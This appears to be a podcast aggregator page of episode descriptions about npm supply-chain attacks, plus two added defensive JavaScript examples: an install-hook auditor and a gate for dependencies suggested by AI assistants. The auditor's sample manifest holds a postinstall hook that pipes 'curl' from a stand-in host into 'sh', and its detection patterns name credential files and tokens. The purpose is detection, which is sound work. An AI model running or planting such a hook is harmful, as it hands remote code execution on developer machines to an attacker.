This conversation focuses on a shift that security leaders can no longer ignore. Malicious packages are not exploiting accidental coding errors. They are intentionally engineered to steal credentials, exfiltrate secrets, and compromise environments long before traditional security tools see anything wrong. Attacks increasingly begin on developer machines through social engineering and poisoned repositories, then propagate into CI pipelines where access density and sensitive credentials converge.

Paul outlines why many existing security approaches fall short. Vulnerability databases were built for mistakes, not hostile code. AppSec teams are overloaded burning down backlogs. Security operations teams rarely receive meaningful telemetry from build systems. The result is a visibility gap where malicious code can run, disappear, and leave organizations unsure what was touched or stolen.

The episode also explores why simple advice like "only use vetted packages" fails in practice. Open source ecosystems move too fast for manual approval models, and internal package repositories often collapse under friction. Meanwhile, attackers exploit maintainer accounts, typosquatted names, and ecosystem trust to reach billions of downstream installations in a single event.

This discussion challenges security leaders to rethink how software supply chain risk is defined, detected, and owned. The problem is no longer theoretical, and it no longer lives only in development teams. It sits at the intersection of intellectual property, identity, and delivery velocity, demanding attention from anyone responsible for protecting modern software-driven organizations.

⬥GUEST⬥
Paul McCarty, NPM Hacker and Software Supply Chain Researcher | On LinkedIn: https://www.linkedin.com/in/mccartypaul/
⬥HOST⬥
Sean Martin, Co-Founder at ITSPmagazine and Host of Redefining CyberSecurity Podcast | On LinkedIn: https://www.linkedin.com/in/imsmartin/ | Website: https://www.seanmartin.com
⬥RESOURCES⬥
LinkedIn Post: https://www.linkedin.com/posts/mccartypaul_i-want-to-introduce-you-to-my-latest-project-activity-7396297753196363776-1N-T
Open Source Malware Database: https://opensourcemalware.com
OpenSSF Scorecard Project: https://securityscorecards.dev
⬥ADDITIONAL INFORMATION⬥
✨ More Redefining CyberSecurity Podcast:
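The two mechanisms the episode keeps returning to, install-time lifecycle scripts that run on a developer laptop or CI runner, and lookalike package names, are both things you can check before a package ever executes. The following Node.js script is an added example and is not code from the episode, from Paul McCarty, or from any project named on this page. It audits a set of package manifests for install-time hooks whose commands show hostile indicators, and for names within one edit of a package you already trust. The manifests, the trusted-name list and the indicator patterns are all constructed for this example and are not a vendor signature set.

```javascript
'use strict';

// Lifecycle hooks npm runs automatically during `npm install`. `prepare`
// also runs for git dependencies and local installs, so it is included.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic indicators of install-time hostility. Illustrative patterns
// chosen for this example; a real deployment would tune and extend them.
const INDICATORS = [
  { re: /\b(curl|wget)\b/i, why: 'downloads content at install time' },
  { re: /\beval\s*\(/, why: 'eval() in an install hook' },
  { re: /base64/i, why: 'base64 handling in an install hook' },
  { re: /\bnode\s+-e\s/, why: 'inline node -e execution' },
  { re: /\b(NPM_TOKEN|GITHUB_TOKEN|AWS_SECRET_ACCESS_KEY|AWS_ACCESS_KEY_ID)\b/,
    why: 'touches a credential environment variable' },
  { re: /~\/\.(npmrc|ssh|aws|gitconfig)\b/, why: 'reads a home-directory credential file' },
];

// Findings for one package.json object. Every install hook is reported as
// `info` (you want to know it exists); indicator matches are `high`.
function auditInstallScripts(manifest) {
  const findings = [];
  const scripts = (manifest && manifest.scripts) || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    findings.push({ pkg: manifest.name, hook, severity: 'info', why: 'has an install-time hook', cmd });
    for (const { re, why } of INDICATORS) {
      if (re.test(cmd)) findings.push({ pkg: manifest.name, hook, severity: 'high', why, cmd });
    }
  }
  return findings;
}

// Single-row Levenshtein edit distance, used for lookalike-name detection.
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];       // d[i-1][j-1]
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];    // d[i-1][j] before overwrite
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + cost);
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Trusted names that `name` is close to but not equal to.
function typosquatCandidates(name, trusted, maxDistance = 1) {
  const out = [];
  for (const t of trusted) {
    if (t === name) continue;
    const d = levenshtein(name, t);
    if (d <= maxDistance) out.push({ name, lookalikeOf: t, distance: d });
  }
  return out;
}

// Run both checks over a list of manifests (e.g. every node_modules/*/package.json).
function auditTree(manifests, trusted) {
  const findings = [];
  for (const m of manifests) {
    findings.push(...auditInstallScripts(m));
    for (const c of typosquatCandidates(m.name, trusted)) {
      findings.push({ pkg: m.name, hook: null, severity: 'medium',
        why: `name is ${c.distance} edit(s) from ${c.lookalikeOf}`, cmd: null });
    }
  }
  return findings;
}

// Constructed sample manifests for this example; none of these are real packages.
const SAMPLE_MANIFESTS = [
  { name: 'left-padd', version: '1.0.3',
    scripts: { postinstall: 'node -e "require(\'child_process\').exec(\'curl -s https://example.invalid/x | sh\')"' } },
  { name: 'left-pad', version: '1.3.0' },
  { name: 'native-thing', version: '2.0.0', scripts: { install: 'node-gyp rebuild' } },
  { name: 'harmless', version: '0.1.0', scripts: { test: 'jest' } },
];
const TRUSTED = ['left-pad', 'lodash', 'express'];

function main() {
  const findings = auditTree(SAMPLE_MANIFESTS, TRUSTED);
  for (const f of findings) console.log(`[${f.severity}] ${f.pkg} ${f.hook || ''} ${f.why}`);
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) main();
```

On a real tree, feed `auditTree` the parsed `node_modules/*/package.json` files and treat any `high` finding as a stop-the-pipeline event rather than a warning. The `info` findings are the list of packages that get to run code on every install; pair the audit with `npm config set ignore-scripts true` on CI runners and developer machines so that a hook you have not reviewed never runs at all, and re-enable scripts only for the packages (such as native builds) that genuinely need them.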
In this episode of The Cybersecurity Defenders Podcast, we discuss some intel being shared in the LimaCharlie community. For more information about Cybersecurity Cares, visit cybersecurity-cares.com.
The Tomiris cyber-espionage group, which has been under Kaspersky's watch since 2021, has evolved its tactics in a new wave of attacks observed in early 2025.
CISA has recently added CVE-2021-26829 to its Known Exploited Vulnerabilities (KEV) catalog, marking it as a confirmed threat based on real-world exploitation.
Researchers at Koi Security have identified a malicious npm package which not only performs typical credential-stealing behavior but also includes a new, subtle tactic: attempting to manipulate AI-driven security scanners via embedded prompt injection.
Iranian state-sponsored threat group MuddyWater has launched a new wave of cyber espionage attacks targeting Israeli organizations across sectors including academia, civil infrastructure, engineering, technology and utilities.
Support our show by sharing your favorite episodes with a friend, subscribe, give us a rating or leave a comment on your podcast platform. This podcast is brought to you by LimaCharlie, maker of the SecOps Cloud Platform, infrastructure for SecOps where everything is built API first. Scale with confidence as your business grows. Start today for free at limacharlie.io.
On this week's episode, esVolta CEO Randy Mann joins Andrew Burnes to discuss some of the issues facing a well-established storage IPP in the 2025 market landscape.The conversation includes a look into the realities of FEOC and the status of domestic and alternative supply, including alternate chemistries, as well as a look at how storage values are holding in ERCOT as new storage capacity enters the market.Randy also discusses the logistics and risk of entering newer markets and gets specific on which ones the firm will be targeting in the next couple of years.NPM is a leading data, intelligence & events company providing business development led coverage of the US & European power, storage & data center markets for the development, finance, M&A and corporate community.Download our mobile app.
Linux 6.18 is officially out, and officially an LTS release, 6.19 has plenty to be excited about, including the color pipeline API. NVIDIA is making progress with Wayland and other regions, Fedora is moving away from FBCON, and Flowblade sees a Wayland-only future. NPM has a worm problem, and we're still gaining ground on Steam! For tips, we have scx for rolling your own userspace scheduler, and a fix for Yakuake for your old-school terminal needs. You can find the show notes at https://bit.ly/44ISvVi and have a great week! Host: Jonathan Bennett Co-Host: Jeff Massie Download or subscribe to Untitled Linux Show at https://twit.tv/shows/untitled-linux-show Want access to the ad-free video and exclusive features? Become a member of Club TWiT today! https://twit.tv/clubtwit Club TWiT members can discuss this episode and leave feedback in the Club TWiT Discord.
This week we welcome Ed Skoudis to talk about the holiday hack challenge (https://sans.org/HolidayHack). In the security news: Oh Asus Dashcam botnets Weird CVEs being issued CodeRED, but not the worm Free IP checking Internet space junk and IoT Decade old Linux kernel vulnerabilities Breaking out of Claude code Malicious LLMs Hacker on a plan gets 7 years Putting passwords into random websites NPM supply chains strike again LLMs will never be intelligent Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-903
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SmartTube Android App Compromise: The key a developer used to sign the Android YouTube player SmartTube was compromised and used to publish a malicious version. https://github.com/yuliskov/SmartTube/issues/5131#issue-3670629826 https://github.com/yuliskov/SmartTube/releases/tag/notification
Two Years, 17K Downloads: The NPM Malware That Tried to Gaslight Security Scanners: Over the course of two years, a malicious npm package was repeatedly updated to evade detection; it has now been identified, in part, because of its attempt to bypass AI-based scanners through prompt injection. https://www.koi.ai/blog/two-years-17k-downloads-the-npm-malware-that-tried-to-gaslight-security-scanners
Stored XSS Vulnerability via SVG Animation, SVG URL, and MathML Attributes: Angular fixed a stored XSS vulnerability reachable through SVG animation, SVG URL, and MathML attributes. https://github.com/angular/angular/security/advisories/GHSA-v4hv-rgfq-gp49
The podcast is ailing: Cloudflare had a three-hour hiccup, the co-host has coughing fits, and worms once again infested npm. Christopher and Sylvester take an extensive look at what the second edition of the JavaScript malware "Sha1-Hulud" does differently from the first, and also revisit "Glassworm", a topic from recent episodes. In hindsight it is unclear whether that one really is a worm or perhaps rather a botnet, as Christopher suspects. The three-hour Cloudflare outage is also on the agenda, with unusually generous praise from the hosts, and the two heise editors also examine whether WhatsApp really suffered the largest data leak in history.
- Cloudflare on the outage of 18 November: https://blog.cloudflare.com/18-november-2025-outage/
- Threema on the WhatsApp scraping: https://threema.com/de/blog/whatsapp-datenleck-2025
- Trend Micro's technical analysis of Shai-Hulud 2.0: https://www.trendmicro.com/en_us/research/25/k/shai-hulud-2-0-targets-cloud-and-developer-systems.html
- Expel on cache smuggling: https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/
- Follow us in the Fediverse: @christopherkunz@chaos.social and @syt@social.heise.de
Laura Pagliarulo, CEO and co-founder of SolaREIT, joins the podcast this week to discuss the rise of powered land banks to support data centers and other forms of load demand. Later in the program, she also discusses the forecast for US battery energy storage and what growth might look like with FEOC restrictions being implemented in January 2026.*This podcast is sponsored by Meter.Meter provides full-stack, integrated networking. They design, deploy, and manage wired, wireless, and cellular infrastructure for large data center campuses, warehouses, and branch offices.With Meter, businesses get fast, secure, and scalable connectivity for a predictable monthly rate, without the complexity of managing multiple providers or tools.Go to meter.com/npm to book a demo today! NPM is a leading data, intelligence & events company providing business development led coverage of the US & European power, storage & data center markets for the development, finance, M&A and corporate community.Download our mobile app.
(Presented by Material Security (https://material.security): We protect your company's most valuable materials -- the emails, files, and accounts that live in your Google Workspace and Microsoft 365 cloud offices.) Three Buddy Problem - Episode 74: We attempt to parse the rumor-fog around Microsoft's CISO at CYBERWARCON and what it reveals about the company's shifting posture on intel sharing, regulation, and its outsized grip on the security ecosystem. Plus, coverage of the Shai-Hulud npm supply-chain mess, CISA's mobile spyware guidance, NSO's legal contortions, a sharp new GRU-linked intrusion from Arctic Wolf. We also discuss the FCC retreating on telco security rules, and the emerging AI arms race shaping how cloud giants hunt threats and how Washington misunderstands all of it. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Ryan Naraine (https://twitter.com/ryanaraine) and Costin Raiu (https://twitter.com/craiu).
In this episode, the host addresses a previous mistake in naming a company involved in a breach, correcting SitusAMC for Ascensus, and extends apologies. Key topics include US banks assessing the fallout from a breach at financial tech vendor SitusAMC, the ransomware group Cl0p targeting Broadcom through Oracle vulnerabilities, a new malware campaign hiding StealC in Blender 3D models, supply chain attacks in the JavaScript ecosystem through npm packages carrying the Shai-Hulud malware, and a phishing scam using lookalike domains to deceive Microsoft account holders. Listeners are reminded to manually type URLs to avoid phishing scams, and are informed about the Thanksgiving weekend schedule change.
00:00 Introduction and Apology
01:26 Cybersecurity Headlines
02:13 US Banks Data Theft Incident
03:44 Broadcom and Oracle ERP Breach
05:29 Blender Malware Campaign
07:45 Shai-Hulud NPM Package Attack
09:41 Phishing Campaign Targeting Microsoft Accounts
11:39 Final Thoughts and Thanksgiving Wishes
In today's episode of Cybersecurity Today, hosted by Jim Love, several major cybersecurity incidents are discussed. US banks are assessing the impact of a security breach at SitusAMC, where the ALFV ransomware group claimed to have stolen three terabytes of data. Cl0p has targeted Broadcom through Oracle E-Business Suite vulnerabilities. A new malware campaign hides inside Blender 3D models, exploiting the auto-run feature to deploy the StealC malware. The JavaScript ecosystem faces a supply chain attack from the Shai-Hulud malware compromising 500 npm packages. Additionally, a phishing campaign leveraging visual deception with lookalike domains is targeting Microsoft account holders. The show is brought to you by Meter, which provides integrated networking solutions.
00:00 Introduction and Sponsor Message
00:21 US Banks Data Theft Incident
02:24 Broadcom and Oracle ERP Breach
04:09 Blender Files Supply Chain Attack
06:24 NPM Packages Compromised
08:21 Phishing Campaign Targeting Microsoft Accounts
10:19 Conclusion and Sponsor Message
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Conflicts between URL mapping and URL based access control: Mapping different URLs to the same script, and relying on URL based authentication at the same time, may lead to dangerous authentication and access control gaps. https://isc.sans.edu/diary/Conflicts%20between%20URL%20mapping%20and%20URL%20based%20access%20control./32518
Sha1-Hulud, The Second Coming: A new, destructive variant of the Shai-Hulud worm is currently spreading through npm packages and GitHub repos. https://www.koi.ai/incident/live-updates-sha1-hulud-the-second-coming-hundred-npm-packages-compromised
Hacklore: Cleaning up Outdated Security Advice: A new website, hacklore.org, has published an open letter from former CISOs and other security leaders aimed at addressing some outdated security advice that is often repeated. https://www.hacklore.org
The latest episode of Absolute AppSec is here, with Ken Johnson and Seth Law checking in during the busy Q4 holiday season to share some fascinating insights on the evolving landscape of security and technology. They kick off by reflecting on their intensive, ever-changing "Harnessing LLMs for Application Security" courses, noting how rapidly the underlying tech evolves. The conversation quickly turns to a compelling debate: How will the rise of generative AI impact career paths for newcomers, especially given that LLMs fundamentally rely on the contributions of existing experts? While pathways may change, they agree that core human activities—like networking, contributing to projects, and maintaining a hacker mindset—will remain crucial. The hosts then dive into a fascinating discussion on the darker side of SEO, introducing the concept of Generative AI Engine Optimization (GEO), where marketers exploit AI search results through tricks like keyword-stuffed files to game rankings. They tie this to historical examples of exploitation, harkening back to Google hacking days. Finally, they cover the recent Shai Hulud 2 supply chain attack, which infected hundreds of NPM packages and utilized even more sophisticated obfuscation and delayed execution tactics than its predecessor.
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Decoding Binary Numeric Expressions Didier updated his number-to-hex script to support simple arithmetic operations in the text. https://isc.sans.edu/diary/Decoding%20Binary%20Numeric%20Expressions/32490 Tea Token NPM Pollution The npm registry was hit with around 150,000 submissions that did not contain any useful contributions, but instead attempted to fake contributions in order to earn the new Tea token. https://aws.amazon.com/blogs/security/amazon-inspector-detects-over-150000-malicious-packages-linked-to-token-farming-campaign/ IBM AIX NIMSH Vulnerabilities IBM patched several critical vulnerabilities in the NIMSH daemon. https://www.ibm.com/support/pages/node/7251173
Just what’s inside that commercial software you bought? Does it contain open-source components, NPM packages, or other third-party code? How could you find out? The answer is a Software Bill of Materials, or SBOM, a machine-readable inventory of a finished piece of software. Why should you care about SBOMs? Our guest, Natalie Somersall, is here... Read more »
Alight chairman and co-founder Harald Överholm joins NPM Europe on this week's episode to give us his take on building a Nordic solar developer into an increasingly pan-European operator of both behind-the-meter and utility-scale, grid-connected PV assets. Harald also provides insight on how data centres could power the corporate PPA market across the Nordics for years to come, how Alight is targeting microgrids for future opportunities, as well as tips for solving the grid connection impasse present in several European markets right now. NPM is a leading data, intelligence & events company providing business development led coverage of the US & European power, storage & data center markets for the development, finance, M&A and corporate community. Download our mobile app.
Josh chats with Charlie Eriksen, a security researcher at Aikido Security. We discuss the recent NPM supply chain attacks that affect hundreds of packages. Charlie shares his experiences dealing with recent security breaches, the challenges of maintaining trust in open source software, and the importance of proactive measures to safeguard open source. The rapid pace of change is impacting our security practices and what steps can be taken to foster resilience in the face of evolving threats. The show notes and blog post for this episode can be found at https://opensourcesecurity.io/2025/2025-11-npm-charlie/
AI-powered web browsers are hitting the scene fast, but Steve and Leo unpack why these smart assistants could usher in an era of security chaos most users aren't ready for. Brace yourself for the wild risks, real-world scams, and the privacy questions no one else is asking. Secret radios discovered in Chinese-made buses. Edge & Chrome introduce LLM-based "scareware" blocking. A perfect example of what scareware blocking hopes to prevent. Aardvark: OpenAI's new vulnerability scanner for code. Italy to require age verification from 48 specific sites. Russia to require the use of only Russian software within Russia. Russia further clamping down on non-MAX Telegram and WhatsApp messaging. 187 new malicious npm packages. Could AI help with that? BadCandy malware has infiltrated Australian Cisco routers. GitHub's 2025 report with the dominance of TypeScript. Windows 11 gets new extra-secure Admin Protection feature. A bunch of interesting feedback and listener thoughts. And why the new AI-driven web browsers may be bringing a whole new world of hurt. Show Notes - https://www.grc.com/sn/SN-1050-Notes.pdf Hosts: Steve Gibson and Leo Laporte Download or subscribe to Security Now at https://twit.tv/shows/security-now. You can submit a question to Security Now at the GRC Feedback Page. For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written, SpinRite 6. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: bitwarden.com/twit joindeleteme.com/twit promo code TWIT canary.tools/twit - use code: TWIT bigid.com/securitynow threatlocker.com for Security Now
Episode 302 of Absolute AppSec has hosts Ken Johnson and Seth Law speculating on the upcoming Global AppSec DC conference, predicting the announcement of the OWASP Top Ten 2025 edition, with Brian Glas scheduled to discuss it on the podcast. The conversation shifts to a technical discussion of OpenAI's new browser, Atlas, which is built on Chromium and includes AI capabilities. The hosts noted concern over the discovered prompt instructions for Atlas, which direct the ChatGPT agent to use browser history and available APIs to find data from the user's logged-in sites to answer ambiguous queries or fulfill requests. This functionality raises significant security concerns, as the agent's ability to comb the cache and logged-in sites could be exploited, effectively creating a "honeypot for cross-site scripting" with malicious potential such as unauthorized money transfers. The hosts discussed the lack of talk submissions on Model Context Protocol (MCP) security at the conference, despite its growing relevance in a world of AI agents and tooling. Finally, they highlighted a new tool called SlopGuard, developed to address the risk of AI assistants hallucinating non-existent, potentially malicious packages (which the hosts say occurs 5-21% of the time) and attempting to install them from registries like npm.
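The hallucinated-package problem raised at the end of that episode, as an added example that is not SlopGuard's code: a pre-install gate that audits the dependencies an AI assistant suggested against registry metadata. It blocks names the registry does not know (a hallucination, or a name nobody has squatted yet) and flags names that exist but were published days ago with almost no downloads, which is what a squatted hallucination looks like once an attacker has registered it. The registry snapshot, the package.json, the fixed clock and the thresholds are all constructed for illustration; a real gate would fetch the same fields from the registry API.

```javascript
// Added example, not SlopGuard's code: a pre-install gate for dependencies
// an AI assistant suggested. The registry snapshot, the package.json and the
// policy thresholds are constructed for illustration; a real gate would pull
// the metadata from the registry API.

const REGISTRY_SNAPSHOT = {
  "express": { created: "2010-12-29", weeklyDownloads: 30000000 },
  "lodash":  { created: "2012-04-23", weeklyDownloads: 40000000 },
  // Exists, but was published days ago and nobody downloads it: the profile
  // of a name an attacker registered after seeing models hallucinate it.
  "react-chart-utils-pro": { created: "2025-10-20", weeklyDownloads: 12 },
};

const SUGGESTED_PACKAGE_JSON = {
  dependencies: {
    "express": "^4.19.0",
    "lodash": "^4.17.21",
    "react-chart-utils-pro": "^1.0.0",
    "langchain-openai-helpers": "^2.1.0", // not in the registry at all
  },
};

// Policy thresholds (assumed values; tune for your environment).
const MIN_AGE_DAYS = 90;
const MIN_WEEKLY_DOWNLOADS = 1000;

function daysBetween(isoDate, now) {
  return (now.getTime() - Date.parse(isoDate + "T00:00:00Z")) / 86400000;
}

// One finding per dependency: "block" for names the registry does not know,
// "review" for names that exist but look freshly squatted, "allow" otherwise.
function auditDependencies(pkgJson, registry, now) {
  const findings = [];
  for (const name of Object.keys(pkgJson.dependencies || {})) {
    const meta = registry[name];
    if (!meta) {
      findings.push({ name, verdict: "block", reason: "not in registry" });
      continue;
    }
    const reasons = [];
    const ageDays = daysBetween(meta.created, now);
    if (ageDays < MIN_AGE_DAYS) reasons.push(`published ${Math.floor(ageDays)} days ago`);
    if (meta.weeklyDownloads < MIN_WEEKLY_DOWNLOADS) reasons.push(`${meta.weeklyDownloads} weekly downloads`);
    findings.push({
      name,
      verdict: reasons.length ? "review" : "allow",
      reason: reasons.join("; "),
    });
  }
  return findings;
}

// Install only when nothing is blocked and nothing is pending review.
function installAllowed(findings) {
  return findings.every((f) => f.verdict === "allow");
}

const NOW = new Date("2025-11-01T00:00:00Z"); // fixed clock for reproducibility
const auditResult = auditDependencies(SUGGESTED_PACKAGE_JSON, REGISTRY_SNAPSHOT, NOW);
for (const f of auditResult) console.log(f.verdict.padEnd(6), f.name, f.reason);
console.log("install allowed:", installAllowed(auditResult));
```

The two thresholds are deliberately separate: a freshly published package with real traffic and a long-lived package with no traffic are both worth a human look, but neither is proof of malice, so they land in "review" rather than "block". Only a name that does not resolve at all is refused outright, because installing it can never be what the developer intended.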
Hey everyone—it's Steve Edwards here, and in this episode of JavaScript Jabber, I'm joined by returning guest Feross Aboukhadijeh, founder of Socket.dev, for a deep dive into the dark and fascinating world of open source supply chain security. From phishing campaigns targeting top npm maintainers to the now-infamous Chalk library compromise, we unpack the latest wave of JavaScript package attacks and what developers can learn from them. Feross explains how some hackers are even using AI tools like Claude and Gemini as part of their payloads—and how defenders like Socket are fighting back with AI-powered analysis of their own. We also dive into GitHub Actions vulnerabilities, the role of two-factor authentication, and the growing need for "phishing-resistant 2FA." Whether you're an open source maintainer or just someone who runs npm install a little too often, this episode will open your eyes to how much happens behind the scenes to keep your code safe.
This is a recap of the top 10 posts on Hacker News on October 30, 2025. This podcast was generated by wondercraft.ai
(00:30): Affinity Studio now free. Original post: https://news.ycombinator.com/item?id=45761445&utm_source=wondercraft_ai
(01:53): Free software scares normal people. Original post: https://news.ycombinator.com/item?id=45760878&utm_source=wondercraft_ai
(03:17): The ear does not do a Fourier transform (2024). Original post: https://news.ycombinator.com/item?id=45762259&utm_source=wondercraft_ai
(04:41): US declines to join more than 70 countries in signing UN cybercrime treaty. Original post: https://news.ycombinator.com/item?id=45760328&utm_source=wondercraft_ai
(06:05): Ventoy: Create bootable USB drive for ISO/WIM/IMG/VHD(x)/EFI Files. Original post: https://news.ycombinator.com/item?id=45760340&utm_source=wondercraft_ai
(07:29): A change of address led to our Wise accounts being shut down. Original post: https://news.ycombinator.com/item?id=45766253&utm_source=wondercraft_ai
(08:52): Denmark reportedly withdraws Chat Control proposal following controversy. Original post: https://news.ycombinator.com/item?id=45765664&utm_source=wondercraft_ai
(10:16): Falling panel prices lead to global solar boom, except for the US. Original post: https://news.ycombinator.com/item?id=45761902&utm_source=wondercraft_ai
(11:40): Language models are injective and hence invertible. Original post: https://news.ycombinator.com/item?id=45758093&utm_source=wondercraft_ai
(13:04): NPM flooded with malicious packages downloaded more than 86k times. Original post: https://news.ycombinator.com/item?id=45755027&utm_source=wondercraft_ai
This is a third-party project, independent from HN and YC. Text and audio generated using AI, by wondercraft.ai. Create your own studio quality podcast with text as the only input in seconds at app.wondercraft.ai. Issues or feedback? We'd love to hear from you: team@wondercraft.ai
Today on the podcast we feature the leadership team of the Jefferson City, Missouri, chapter. They are NPM's 2025 Chapter of the year! We discuss the ways the chapter has increased their membership, cultivated consistent programming, and some of the most important relationships that have strengthened the chapter.
Consumer Reports on Windows 10 updates. Waste (not fraud or abuse) within DoD cyber operations. China's DeepSeek produces deliberately flawed code. WebAssembly v3.0 officially released. Firefox v143 updates and new features. Firefox for Android now offers DoH. A nearly terminal flaw in Microsoft's Entra ID. Chrome hits its 6th 0-day this year. Emergency update. DRAM (now DDR5) still vulnerable to RowHammer. Samsung kitchen refrigerators begin showing ads. China says no to NVIDIA. 300 more (new) malicious npm packages found and removed. The EU is already testing proper online age verification. Show Notes - https://www.grc.com/sn/SN-1044-Notes.pdf Hosts: Steve Gibson and Leo Laporte Download or subscribe to Security Now at https://twit.tv/shows/security-now. You can submit a question to Security Now at the GRC Feedback Page. For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written, SpinRite 6. Join Club TWiT for Ad-Free Podcasts! Support what you love and get ad-free shows, a members-only Discord, and behind-the-scenes access. Join today: https://twit.tv/clubtwit Sponsors: bigid.com/securitynow go.acronis.com/twit zscaler.com/security 1password.com/securitynow hoxhunt.com/securitynow
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Distracting the Analyst for Fun and Profit Our undergraduate intern, Tyler House, analyzed what may have been a small DoS attack that was likely meant more to distract than to actually cause a denial of service. https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Distracting%20the%20Analyst%20for%20Fun%20and%20Profit/32308 GitHub's plan for a more secure npm supply chain GitHub outlined its plan to harden the npm supply chain, in particular in light of the recent attacks against npm packages. https://github.blog/security/supply-chain-security/our-plan-for-a-more-secure-npm-supply-chain/ SolarWinds Web Help Desk AjaxProxy Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVE-2025-26399) SolarWinds Web Help Desk was found to be susceptible to an unauthenticated AjaxProxy deserialization remote code execution vulnerability that, if exploited, would allow an attacker to run commands on the host machine. This vulnerability is a patch bypass of CVE-2024-28988, which in turn is a patch bypass of CVE-2024-28986. https://www.solarwinds.com/trust-center/security-advisories/cve-2025-26399 Vulnerabilities in Supermicro BMC Firmware CVE-2025-7937 CVE-2025-6198 Supermicro fixed two vulnerabilities that could allow an attacker to compromise the BMC with rogue firmware. https://www.supermicro.com/en/support/security_BMC_IPMI_Sept_2025
Nvidia is set to invest $100 billion in OpenAI as it works toward a gigawatt of new infrastructure per week, and GitHub is rolling out new security controls for npm. Starring Jason Howell and Tom Merritt. Show notes found here. Hosted on Acast. See acast.com/privacy for more information.
A new self-replicating malware infects the NPM repository. Microsoft and Cloudflare disrupt a Phishing-as-a-Service platform. Researchers uncover a new Fancy Bear backdoor campaign. The VoidProxy phishing-as-a-service (PhaaS) platform targets Microsoft 365 and Google accounts. A British telecom says its ransomware recovery may stretch into November. A new Rowhammer attack variant targets DDR5 memory. Democrats warn proposed budget cuts could slash the FBI's cyber division staff by half at a heated Senate Judiciary Committee hearing. On our Industry Voices segment, we are joined by Abhishek Agrawal from Material security discussing challenges of securing the Google Workspace. Pompompurin heads to prison. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest On our Industry Voices segment, we are joined by Abhishek Agrawal, CEO and Co-Founder of Material Security, discussing challenges of securing the Google Workspace. You can hear Abhishek's full conversation here. Selected Reading Self-Replicating Worm Hits 180+ Software Packages (Krebs on Security) Microsoft disrupts the RaccoonO365 Phishing-as-a-Service operation, names alleged leader (Help Net Security) Fancy Bear attacks abuse Office macros, legitimate cloud services (SC Media) VoidProxy phishing operation targets Microsoft 365, Google accounts (SC Media) UK telco Colt's cyberattack recovery seeps into November (The Register) Ruh-roh. DDR5 memory vulnerable to new Rowhammer attack (The Register) Senators, FBI Director Patel clash over cyber division personnel, arrests (CyberScoop) House lawmakers move to extend two key cyber programs, for now (The Record) BreachForums founder caged after soft sentence overturned (The Register) Share your feedback. What do you think about CyberWire Daily? 
Please take a few minutes to share your thoughts with us by completing our brief listener survey. Thank you for helping us continue to improve our show. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Why You Need Phishing-Resistant Authentication NOW. The recent compromise of a number of high-profile npmjs.com accounts has yet again shown how dangerous a simple phishing email can be. https://isc.sans.edu/diary/Why%20You%20Need%20Phishing%20Resistant%20Authentication%20NOW./32290 S1ngularity/nx Attackers Strike Again A second wave of attacks has hit over a hundred npm-related GitHub repositories. The updated payload implements a worm that propagates itself to other repositories. https://www.aikido.dev/blog/s1ngularity-nx-attackers-strike-again ChatGPT's Calendar Integration Can Be Exploited to Steal Emails ChatGPT's new MCP integration can be used, via prompt injection, to affect software connected to ChatGPT via MCP. https://www.linkedin.com/posts/eito-miyamura-157305121_we-got-chatgpt-to-leak-your-private-email-activity-7372306174253256704-xoX1/
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Apple Updates Apple released major updates for all of its operating systems. In addition to new features, these updates patch 33 different vulnerabilities. https://isc.sans.edu/diary/Apple%20Updates%20Everything%20-%20iOS%20macOS%2026%20Edition/32286 Microsoft End of Life On October 14th, support for Windows 10, Exchange 2016, and Exchange 2019 will end. https://support.microsoft.com/en-us/windows/windows-10-support-ends-on-october-14-2025-2ca8b313-1946-43d3-b55c-2b95b107f281#:~:text=As%20a%20reminder%2C%20Windows%2010,one%20that%20supports%20Windows%2011. https://techcommunity.microsoft.com/blog/exchange/t-9-months-exchange-server-2016-and-exchange-server-2019-end-of-support/4366605 Phishing Targeting Rust Developers Rust developers are reporting phishing emails similar to the ones that caused the major npm compromise last week. https://github.com/rust-lang/crates.io/discussions/11889#discussion-8886064 Samsung Patches 0-Day Samsung released its monthly updates for its flagship phones, fixing, among other vulnerabilities, an already exploited 0-day. https://security.samsungmobile.com/securityUpdate.smsb
Show Description: Dave's got a whiskey-related content warning, recent security vulnerabilities in npm, challenges with password management, and the complexities of digital security. They delve into Google's antitrust issues and the dynamics of the browser market, before transitioning to innovations in CSS, including custom properties and functions. The conversation wraps up with thoughts on the future of CSS and web development.
Links:
Whiskey Web and Whatnot: Web Development, Neat
